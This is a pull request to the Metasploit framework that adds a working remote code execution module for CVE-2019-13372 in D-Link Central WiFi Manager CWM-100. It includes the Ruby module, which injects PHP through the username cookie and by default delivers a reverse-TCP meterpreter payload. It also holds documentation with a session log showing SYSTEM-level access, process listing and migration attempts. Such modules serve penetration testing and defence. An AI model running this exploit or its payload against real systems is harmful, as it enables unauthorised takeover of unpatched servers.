### PR TITLE
Add RCE exploit for CVE-2019-13372

### DIFF
--- a/documentation/modules/exploit/windows/http/dlink_central_wifimanager_rce.md
+++ b/documentation/modules/exploit/windows/http/dlink_central_wifimanager_rce.md
@@ -1,0 +1,78 @@
+## Vulnerable Application
+
+### Introduction
+
+This module exploits a PHP code injection vulnerability in D-Link Central WiFiManager CWM‑100,
+the vulnerability exists because a user-controlled cookie is passed to the eval function without being
+sanitized.
+
+Because the HTTP server runs in the context of a privilegied user (with a default installation),
+successful exploitation results in code execution as nt_authority\system.
+
+a vulnerable version is available at DLink's vulnerability announcement:
+- [The announcenment](https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10117)
+- [Direct download link](ftp://ftp2.dlink.com/SOFTWARE/CENTRAL_WIFI_MANAGER/CENTRAL_WI-FI_MANAGER_1.03.zip)
+
+## Verification Steps
+
+1. Start `msfconsole`
+2. Do: `use windows/http/dlink_central_wifimanager_rce`
+3. Do: `set RHOSTS [RHOSTS]`
+4. Check the payload options: `show options`
+5. Do: `exploit`
+6. Verify that you get a shell / meterpreter / that whatever payload you used was executed
+
+## Options
+
+No additional options
+
+## Scenarios
+
+### CWM-100 v1.03
+
+#### Getting a meterpreter session
+
+```
+msf5 exploit(windows/http/dlink_central_wifimanager_rce) > 
+msf5 exploit(windows/http/dlink_central_wifimanager_rce) > exploit 
+
+[*] Started reverse TCP handler on 192.168.1.222:4444 
+[*] Executing automatic check (disable AutoCheck to override)
+[+] The target is vulnerable.
+[*] Sending stage (38288 bytes) to 192.168.1.223
+[*] Meterpreter session 1 opened (192.168.1.222:4444 -> 192.168.1.223:1783) at 2020-08-13 14:51:09 +0200
+
+meterpreter > sysinfo
+Computer    : REVM-PC
+OS          : Windows NT REVM-PC 6.1 build 7601 (Windows 7 Professional N Edition Service Pack 1) i586
+Meterpreter : php/windows
+meterpreter > getuid 
+Server username: SYSTEM (0)
+meterpreter > pwd
+C:\Program Files (x86)\D-Link\Central WifiManager\web
+meterpreter > ls
+Listing: C:\Program Files (x86)\D-Link\Central WifiManager\web
+==============================================================
+
+Mode              Size    Type  Last modified              Name
+----              ----    ----  -------------              ----
+100666/rw-rw-rw-  177     fil   2014-09-16 16:19:18 +0200  .htaccess
+100666/rw-rw-rw-  138884  fil   2016-01-28 13:36:32 +0100  AP_Installation_utility_for_cwm.zip
+40777/rwxrwxrwx   4096    dir   2020-08-13 12:50:25 +0200  CapLoginStyle
+40777/rwxrwxrwx   0       dir   2020-08-13 12:50:25 +0200  Common
+40777/rwxrwxrwx   4096    dir   2020-08-13 12:50:45 +0200  Conf
+40777/rwxrwxrwx   0       dir   2020-08-13 12:50:25 +0200  DBBackup
+40777/rwxrwxrwx   4096    dir   2020-08-13 12:50:44 +0200  Lang
+40777/rwxrwxrwx   0       dir   2020-08-13 12:50:26 +0200  Lib
+40777/rwxrwxrwx   4096    dir   2020-08-13 12:50:45 +0200  Public
+100666/rw-rw-rw-  256     fil   2014-09-16 16:19:18 +0200  README.txt
+40777/rwxrwxrwx   0       dir   2020-08-13 13:02:13 +0200  Runtime
+40777/rwxrwxrwx   4096    dir   2020-08-13 12:50:27 +0200  ThinkPHP
+40777/rwxrwxrwx   0       dir   2020-08-13 12:50:26 +0200  Tpl
+40777/rwxrwxrwx   4096    dir   2020-08-13 12:50:38 +0200  captivalportal
+40777/rwxrwxrwx   4096    dir   2020-08-13 12:50:36 +0200  ckeditor
+100666/rw-rw-rw-  15086   fil   2014-09-16 16:19:18 +0200  favicon.ico
+100666/rw-rw-rw-  158     fil   2014-09-16 16:19:18 +0200  index.php
+100666/rw-rw-rw-  122     fil   2015-10-29 14:17:48 +0100  redrect.php
+100666/rw-rw-rw-  211     fil   2014-09-16 16:19:18 +0200  robots.txt
+```

--- a/documentation/modules/exploit/windows/http/dlink_central_wifimanager_rce.md
+++ b/documentation/modules/exploit/windows/http/dlink_central_wifimanager_rce.md
@@ -6,7 +6,7 @@ This module exploits a PHP code injection vulnerability in D-Link Central WiFiMa
 the vulnerability exists because a user-controlled cookie is passed to the eval function without being
 sanitized.
 
-Because the HTTP server runs in the context of a privilegied user (with a default installation),
+Because the HTTP server runs in the context of a privileged user (with a default installation),
 successful exploitation results in code execution as nt_authority\system.
 
 a vulnerable version is available at DLink's vulnerability announcement:

--- a/documentation/modules/exploit/windows/http/dlink_central_wifimanager_rce.md
+++ b/documentation/modules/exploit/windows/http/dlink_central_wifimanager_rce.md
@@ -2,8 +2,8 @@
 
 ### Introduction
 
-This module exploits a PHP code injection vulnerability in D-Link Central WiFiManager CWM‑100,
-the vulnerability exists because a user-controlled cookie is passed to the eval function without being
+This module exploits a PHP code injection vulnerability in D-Link Central WiFiManager CWM‑100.
+The vulnerability exists because a user-controlled cookie is passed to the `eval()` function without being
 sanitized.
 
 Because the HTTP server runs in the context of a privileged user (with a default installation),

--- a/documentation/modules/exploit/windows/http/dlink_central_wifimanager_rce.md
+++ b/documentation/modules/exploit/windows/http/dlink_central_wifimanager_rce.md
@@ -9,7 +9,7 @@ sanitized.
 Because the HTTP server runs in the context of a privileged user (with a default installation),
 successful exploitation results in code execution as nt_authority\system.
 
-a vulnerable version is available at DLink's vulnerability announcement:
+A vulnerable version is available at DLink's vulnerability announcement:
 - [The announcement](https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10117)
 - [ftp://ftp2.dlink.com/SOFTWARE/CENTRAL_WIFI_MANAGER/CENTRAL_WI-FI_MANAGER_1.03.zip](ftp://ftp2.dlink.com/SOFTWARE/CENTRAL_WIFI_MANAGER/CENTRAL_WI-FI_MANAGER_1.03.zip)
 

--- a/documentation/modules/exploit/windows/http/dlink_central_wifimanager_rce.md
+++ b/documentation/modules/exploit/windows/http/dlink_central_wifimanager_rce.md
@@ -10,8 +10,8 @@ Because the HTTP server runs in the context of a privilegied user (with a defaul
 successful exploitation results in code execution as nt_authority\system.
 
 a vulnerable version is available at DLink's vulnerability announcement:
-- [The announcenment](https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10117)
-- [Direct download link](ftp://ftp2.dlink.com/SOFTWARE/CENTRAL_WIFI_MANAGER/CENTRAL_WI-FI_MANAGER_1.03.zip)
+- [The announcement](https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10117)
+- [ftp://ftp2.dlink.com/SOFTWARE/CENTRAL_WIFI_MANAGER/CENTRAL_WI-FI_MANAGER_1.03.zip](ftp://ftp2.dlink.com/SOFTWARE/CENTRAL_WIFI_MANAGER/CENTRAL_WI-FI_MANAGER_1.03.zip)
 
 ## Verification Steps
 

--- a/modules/exploits/windows/http/dlink_central_wifimanager_rce.rb
+++ b/modules/exploits/windows/http/dlink_central_wifimanager_rce.rb
@@ -1,0 +1,78 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::EXE
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'D-Link Central WiFi Manager CWM(100) RCE',
+        'Description' => %q{
+          This module exploits a PHP code injection vulnerability in D-Link Central WiFi Manager CWM(100),
+          versions older than v1.03R0100_BETA6 should be vulnerable, the code injection exists in the
+          username cookie, which is passed to eval without being sanitized, with the default configuration,
+          dangerous functions are not disabled, which makes it possible to get code execution on the target.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'M3@ZionLab from DBAppSecurity', # Original discovery
+            'Redouane NIBOUCHA <rniboucha[at]yahoo.fr>' # PoC, metasploit module
+          ],
+        'References' =>
+          [
+            ['CVE', '2019-13372'],
+            ['URL', 'https://unh3x.github.io/2019/02/21/D-link-(CWM-100)-Multiple-Vulnerabilities/' ]
+          ],
+        'Targets' => [ [ 'Automatic', {}] ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'PAYLOAD' => 'php/meterpreter/reverse_tcp',
+          'SSL' => true,
+          'RPORT' => 443
+        },
+        'Platform' => %w[php],
+        'Arch' => [ ARCH_PHP ],
+        'DisclosureDate' => 'Jul 9 2019'
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base path to to the web application', '/'])
+      ]
+    )
+  end
+
+  def inject_php(cmd)
+    encode_char = ->(char) { '%' + char.ord.to_s(16).rjust(2, '0') }
+    payload = "',0,\"\",1,\"0\")%3b#{cmd.gsub(/[;\s]/, &encode_char)}%3b//\""
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri, 'index.php', 'Index', 'index'),
+      'cookie' => "username=#{payload};password="
+    )
+    res ? res.body[/^(.*?)<!DOCTYPE html>/mi, 1] : nil
+  end
+
+  def check
+    rand_text = Rex::Text.rand_text_alphanumeric(rand(4..10))
+    if inject_php("echo \"#{rand_text}\"")&.chomp == rand_text
+      Exploit::CheckCode::Vulnerable
+    else
+      Exploit::CheckCode::Unknown
+    end
+  end
+
+  def exploit
+    inject_php(payload.raw)
+  end
+end

--- a/modules/exploits/windows/http/dlink_central_wifimanager_rce.rb
+++ b/modules/exploits/windows/http/dlink_central_wifimanager_rce.rb
@@ -15,10 +15,11 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'D-Link Central WiFi Manager CWM(100) RCE',
         'Description' => %q{
-          This module exploits a PHP code injection vulnerability in D-Link Central WiFi Manager CWM(100),
-          versions older than v1.03R0100_BETA6 should be vulnerable, the code injection exists in the
-          username cookie, which is passed to eval without being sanitized, with the default configuration,
-          dangerous functions are not disabled, which makes it possible to get code execution on the target.
+          This module exploits a PHP code injection vulnerability in D-Link Central WiFi Manager CWM(100)
+          versions below `v1.03R0100_BETA6`. The vulnerability exists in the
+          username cookie, which is passed to `eval()` without being sanitized.
+          Dangerous functions are not disabled by default, which makes it possible
+          to get code execution on the target.
         },
         'License' => MSF_LICENSE,
         'Author' =>

--- a/modules/exploits/windows/http/dlink_central_wifimanager_rce.rb
+++ b/modules/exploits/windows/http/dlink_central_wifimanager_rce.rb
@@ -65,10 +65,9 @@ class MetasploitModule < Msf::Exploit::Remote
   def check
     rand_text = Rex::Text.rand_text_alphanumeric(rand(4..10))
     if inject_php("echo \"#{rand_text}\"")&.chomp == rand_text
-      Exploit::CheckCode::Vulnerable
-    else
-      Exploit::CheckCode::Unknown
+      return Exploit::CheckCode::Vulnerable
     end
+    Exploit::CheckCode::Unknown
   end
 
   def exploit

--- a/modules/exploits/windows/http/dlink_central_wifimanager_rce.rb
+++ b/modules/exploits/windows/http/dlink_central_wifimanager_rce.rb
@@ -8,7 +8,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
   prepend Msf::Exploit::Remote::AutoCheck
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::EXE
 
   def initialize(info = {})
     super(


### PR DESCRIPTION
This module adds a module for [CVE-2019-13372](https://www.cvedetails.com/cve/CVE-2019-13372/), a remote code execution vulnerability in `D-link Central WiFi Manager(CWM-100)`, it's possible to inject PHP code because a user-controlled cookie is passed to `eval()` without being sanitized.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] Do: `use windows/http/dlink_central_wifimanager_rce`
- [ ] Do: `set RHOSTS [RHOSTS]`
- [ ] Set payload options: `LHOST`, `LPORT` etc.
- [ ] Check the payload options: `show options`
- [ ] Do: `exploit`
- [ ] Verify that you get a shell / meterpreter / that whatever payload you used was executed


## Reproducing

a vulnerable version is available at DLink's vulnerability announcement:
- [The announcement](https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10117)
- [ftp://ftp2.dlink.com/SOFTWARE/CENTRAL_WIFI_MANAGER/CENTRAL_WI-FI_MANAGER_1.03.zip](ftp://ftp2.dlink.com/SOFTWARE/CENTRAL_WIFI_MANAGER/CENTRAL_WI-FI_MANAGER_1.03.zip)

## Things to troubleshoot

- The meterpreter payload works fine, but for some reason, when I execute the shell command from meterpreter, I get a cmd prompt, and then it hangs.

- When I try to migrate from meterpreter, I get:
```
meterpreter > ps

Process List
============

 PID   Name                            User                          Path
 ---   ----                            ----                          ----
 0     System Idle Process             NT AUTHORITY\SYSTEM           System Idle Process
 4     System                          NT AUTHORITY\SYSTEM           System
 168   Central WifiManager Server.exe  reVM-PC\reVM                  Central WifiManager Server.exe
 216   smss.exe                        NT AUTHORITY\SYSTEM           smss.exe
 268   svchost.exe                     NT AUTHORITY\NETWORK SERVICE  svchost.exe
 292   csrss.exe                       NT AUTHORITY\SYSTEM           csrss.exe
 340   wininit.exe                     NT AUTHORITY\SYSTEM           wininit.exe
 352   csrss.exe                       NT AUTHORITY\SYSTEM           csrss.exe
 392   winlogon.exe                    NT AUTHORITY\SYSTEM           winlogon.exe
...

meterpreter > migrate 392
[-] Error running command migrate: NoMethodError undefined method `pid' for nil:NilClass
```

No idea if that's a bug in php payloads, but other common meterpreter commands work fine, I wonder if that's something from this exploit.

## Related vulnerabilities

An auxiliary/sqli module for `CVE-2019-13372` will be added soon, part of another pull-request (and using the SQL Injection engine I've been working on)